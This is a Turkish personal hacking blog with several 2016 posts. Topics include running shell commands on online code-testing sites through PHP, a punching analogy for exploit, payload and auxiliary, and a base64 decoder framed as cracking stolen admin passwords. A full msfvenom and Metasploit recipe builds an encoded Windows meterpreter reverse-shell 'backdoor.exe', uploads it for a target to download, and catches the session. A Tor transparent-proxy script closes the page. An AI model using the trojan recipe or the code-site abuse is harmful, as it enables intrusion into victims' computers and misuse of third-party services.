2 Temmuz 2016 Cumartesi

Code Test Siteleri - Zaafiyet

Arkadaşlar uzun süredir bloguma yazı yazamıyorum zaten fazlada takipcim yok galiba okuyanda sadece ben olucam büyük ihtimal ama yazasım geliyor.Konumuza gelelim biliyorsunuzki bir sürü "ONLİNE" kod test etme siteleri var ve bu web siteler haliyle bütün kodları çalıştırıyor.Bazıları farklı bypass yöntemleriyle kırılabiliyor ama benim şuan anlatacağım "PHP" kodu ile sistemde komut çalıştırma. Öncelikle bir web site bulalım kodumuzu çalıştırmak ve komutlarımızı uygulamak için. Google.com iyi bir seçim. Ben bu web siteyi seçtim google'de arattığım üzere bulduğum bir web site şimdi yapacaklarımıza geçelim.Öncelikle farkettiğiniz gibi hertürlü kodu alıyor web sitemiz ve buda bize avantaj sağlıyor. "PHP" taglarımızı açıp linuxta genelde kullanılan "ls -la" komutunu kullanıp içindekiler gösterilecek dizinimizi seçtik bu /etc/passwd'de olabilirdi bu yazdığımız kod ile : cat : okuyabilir mkdir : klasör oluşturabilir whoami : kim olduğumuza bakıp uname -a : bilgilerimizi görebiliriz ve daha bir çok işlem yapabiliriz.Temel linux komutları diye araştırırsak daha birçok şey'i farketedebiliriz. Buda kod test sitesinde bulduğumuz bir zaafiyetti iyi günler :)

8 Mayıs 2016 Pazar

Exploit Nedir ? Payload,Auxiliary Nedir ?

3 Adet örnek bulunmaktadır size hangisi daha açık geldiyse orayı okumaya devam ediniz.

Örnekler İle hazırlamış bulunmaktayım herhangi bir exploit,payload veya auxiliary'i buraya yazmıyorum bu yazım'da birdahakine artık.


Şunu bir yumruk ve birde insan ile anlatalım.

Auxiliary : Yumruğu vuracağın yeri gösteren şey.

Payload : Yumrukla adam'a ne yapacağın.

Exploit : Vurduğun yumruk.

Daha açık şekilde :
---------------------------------------------------------------------------------------------------------------------
Auxiliary'i gözünüz düşünün gözünüz ile adamın neresine vuracağınız size kalmış ben örnek olarak arkasındayım ve kaburgasını kırmak istiyorum kaburgayı gördüm ve hazırlanıyorum hazırlandım artık hedefim kaburga ama kaburgaya yavaşmı vurmak istiyorum hızlımı kırmakmı istiyorum kırmamakmı heh işte orada devreye "PAYLOAD" giriyor ben seçtim kırıyorum abi kesin ama yumruğu vurmadım hala çok sinirliyim vurucam kesin oradada işe "EXPLOİT" karışıyor ve vuruyorsun yumrugu adam pert.
---------------------------------------------------------------------------------------------------------------------

Kısaca :

Auxiliary ile kaburgayı görür ve hedef'i belirlersin.

Payload ile adamın kalbinimi durdurmak istiyorsun , kaburgasınımı kırmak , nefesinimi kesmek.

Exploit ile adamın kaburgasını kırarsın yani cidden yapma noktasına gelip uygularsın.

25 Nisan 2016 Pazartesi

Python İle Base 64 Decoder Yapımı ve Kaynak kodları

Öncelikle Bu işlemin ne için olduğunu anlatalım diyelimki bir web sitenin admin bilgilerini aldınız
ve aşşağıdaki gibi değişik bir şifre ile karşılaştınız her yolu denediniz giremediniz şimdilik base 64 olduğunu nasıl anlayacağımızı anlatmayacağım.ve biliyorsunuz ki her hacker kendi programını kullanır sizde bu felsefeye iyice kendinizi kaptırdınız kendi programınızla kırmak istiyorsunuz.
açıyorsunuz editör'ünüzü yazıyorsunuz kodları .py uzantısı olarak kaydediyorsunuz ve açılan pencereye base64 ile encode edilmiş şifremizi yazıp kırıyoruz.


Admin : Demo123
Şifre : ZGF5YW5j



1
2
3
4
5
6
7
8
#!/usr/bin/python
 
import base64
 
encoded = raw_input("Encoded String:\n")
print "\n----- Analyzing -----\n"
decoded = base64.b64decode(encoded)
print "FOUND:\n", decoded
raw_input("Cikmak icin enter'a basiniz: ")

6 Mart 2016 Pazar

Bu yazımda trojan oluşturup herhangi bir windows sürümüne girmeyi anlatıcam.
Öncelikle trojanımızı oluşturuyoruz alttaki gibi.Bu sadece kendi ağınızdakiler için geçerlidir.

msfvenom -p windows/meterpreter/reverse_tcp -a x86 -e x86/shikata_ga_nai -f exe > Desktop/backdoor.exe LHOST=192.168.5.10 LPORT=81

Trojan'ı oluşturduktan sonra herhangi bir upload sitesine atıyoruz hedef bilgisayarın indirmesi için.
ama trojan'ı karşı tarafa yollamadan önce trojan'ımızı dinlemeye alıyoruz ki hedef bilgisayar indirince bilgisayarında root yetkisine sahip olabilelim.

Exploit'imizi kullanıyoruz.

use multi/handler

Payload'ımızı ekliyoruz.

set PAYLOAD windows/meterpreter/reverse_tcp

Localhost Yani kendi ip'mizi belirtiyoruz.

set LHOST 192.168.5.10

Localport Yani kendi port'umuzu belirtiyoruz.

set LPORT 81

ve uygulama işlemine geçiyoruz.Başlatmak için aşşağıdaki komutlardan herhangi birini yazabilirsiniz.Yazdıktan sonra trojan'ımız hazır hedef bilgisayar trojan'ımızı açtığı anda onun bilgisayarına bağlanacağız.

exploit

run

20 Şubat 2016 Cumartesi

Arkadaşlar videomda ne yapılması gerektiğini açık bir şekilde anlattım videoyu izledikten sonra kullandığım kodları burada bulabilirsiniz.
Video : https://www.youtube.com/watch?v=XAzrt7jLbhI

-----------------------------------------


leafpad  /etc/apt/sources.list

deb http://deb.torproject.org/torproject.org wheezy main

apt-get update

gpg --keyserver keys.gnupg.net --recv 886DDD89
gpg --export A3C4F0F979CAA22CDBA8F512EE8CBC9E886DDD89 | sudo apt-key add -

apt-get install deb.torproject.org-keyring

apt-get install tor

leafpad /etc/default/tor   :  UN_DAEMON=”no” yazan kısmı görürsünüz ilk başta onu ''yes'' olarak değiştiriyoruz


başlatmak için : service tor start
durdurmak için : service tor stop
statüleri görmek için : service tor status
tor'a restart atmak için : service tor restart


backbox-anonymous.sh yazılacak kod :

#
# You should have received a copy of the GNU General Public License
# along with backbox-anonymous. If not, see <http://www.gnu.org/licenses/>.

export BLUE='\033[1;94m'
export GREEN='\033[1;92m'
export RED='\033[1;91m'
export ENDC='\033[1;00m'

# Destinations you don't want routed through Tor
NON_TOR="192.168.0.0/16 172.16.0.0/12 10.0.0.0/8"

# The GID Tor runs as
TOR_GID="debian-tor"

# Tor's TransPort
TRANS_PORT="9040"

case "$1" in
    start)
        # Make sure only root can run this script
        if [ $(id -u) -ne 0 ]; then
          echo "\n$RED[!] This script must be run as root$ENDC\n" >&2
          exit 1
        fi
     
        # Check torrc config file
        grep -q -x 'VirtualAddrNetwork 10.192.0.0/10' /etc/tor/torrc
        if [ $? -ne 0 ]; then
            echo "\n$RED[!] Please add the following to your /etc/tor/torrc and restart service:$ENDC\n" >&2
            echo "$BLUE#----------------------------------------------------------------------#$ENDC"
            echo "VirtualAddrNetwork 10.192.0.0/10"
            echo "AutomapHostsOnResolve 1"
            echo "TransPort 9040"
            echo "DNSPort 53"
            echo "$BLUE#----------------------------------------------------------------------#$ENDC\n"
            exit 1
        fi
        grep -q -x 'AutomapHostsOnResolve 1' /etc/tor/torrc
        if [ $? -ne 0 ]; then
            echo "\n$RED[!] Please add the following to your /etc/tor/torrc and restart service:$ENDC\n" >&2
            echo "$BLUE#----------------------------------------------------------------------#$ENDC"
            echo "VirtualAddrNetwork 10.192.0.0/10"
            echo "AutomapHostsOnResolve 1"
            echo "TransPort 9040"
            echo "DNSPort 53"
            echo "$BLUE#----------------------------------------------------------------------#$ENDC\n"
            exit 1
        fi
        grep -q -x 'TransPort 9040' /etc/tor/torrc
        if [ $? -ne 0 ]; then
            echo "\n$RED[!] Please add the following to your /etc/tor/torrc and restart service:$ENDC\n" >&2
            echo "$BLUE#----------------------------------------------------------------------#$ENDC"
            echo "VirtualAddrNetwork 10.192.0.0/10"
            echo "AutomapHostsOnResolve 1"
            echo "TransPort 9040"
            echo "DNSPort 53"
            echo "$BLUE#----------------------------------------------------------------------#$ENDC\n"
            exit 1
        fi
        grep -q -x 'DNSPort 53' /etc/tor/torrc
        if [ $? -ne 0 ]; then
            echo "\n$RED[!] Please add the following to your /etc/tor/torrc and restart service:$ENDC\n" >&2
            echo "$BLUE#----------------------------------------------------------------------#$ENDC"
            echo "VirtualAddrNetwork 10.192.0.0/10"
            echo "AutomapHostsOnResolve 1"
            echo "TransPort 9040"
            echo "DNSPort 53"
            echo "$BLUE#----------------------------------------------------------------------#$ENDC\n"
            exit 1
        fi

        echo "\n$BLUE[i] Starting anonymous mode:$ENDC\n"
     
        if [ ! -e /var/run/tor/tor.pid ]; then
            echo " $RED*$ENDC Tor is not running! Quitting...\n" >&2
            exit 1
        fi
     
        iptables -F
        iptables -t nat -F
        echo " $GREEN*$ENDC Deleted all iptables rules"

        echo 'nameserver 127.0.0.1' > /etc/resolv.conf
        echo " $GREEN*$ENDC Modified resolv.conf to use Tor"

        iptables -t nat -A OUTPUT -m owner --gid-owner $TOR_GID -j RETURN
        iptables -t nat -A OUTPUT -p udp --dport 53 -j REDIRECT --to-ports 53
        for NET in $NON_TOR 127.0.0.0/9 127.128.0.0/10; do
            iptables -t nat -A OUTPUT -d $NET -j RETURN
        done
        iptables -t nat -A OUTPUT -p tcp --syn -j REDIRECT --to-ports $TRANS_PORT
        iptables -A OUTPUT -m state --state ESTABLISHED,RELATED -j ACCEPT
        for NET in $NON_TOR 127.0.0.0/8; do
                iptables -A OUTPUT -d $NET -j ACCEPT
        done
        iptables -A OUTPUT -m owner --gid-owner $TOR_GID -j ACCEPT
        iptables -A OUTPUT -j REJECT
        echo "$GREEN *$ENDC Redirected all traffic throught Tor\n"

        echo "$BLUE[i] Are you using Tor?$ENDC\n"
        echo "$GREEN *$ENDC Please refer to https://check.torproject.org\n"
    ;;
    stop)
        # Make sure only root can run our script
        if [ $(id -u) -ne 0 ]; then
          echo "\n$RED[!] This script must be run as root$ENDC\n" >&2
          exit 1
        fi
     
        echo "\n$BLUE[i] Stopping anonymous mode:$ENDC\n"

        echo 'nameserver 208.67.222.222' >  /etc/resolv.conf
        echo 'nameserver 208.67.220.220' >> /etc/resolv.conf
        echo " $GREEN*$ENDC Modified resolv.conf to use OpenDNS"
     
        iptables -F
        iptables -t nat -F
        echo " $GREEN*$ENDC Deleted all iptables rules\n"
    ;;
    restart)
        $0 stop
        $0 start
    ;;
    *)
    echo "Usage: $0 {start|stop|restart}"
    exit 1
    ;;
esac

exit 0



cd Desktop

chmod 755 backbox-anonymous.sh

mv backbox-anonymous /usr/bin/backbox-anonymous

leafpad /etc/tor/torrc    yazılacak kod :
VirtualAddrNetwork 10.192.0.0/10
AutomapHostsOnResolve 1
TransPort 9040
DNSPort 53


başlatmak için : backbox-anonymous start
durdurmak için : backbox-anonymous stop
yeniden başlatmak için : backbox-anonymous restart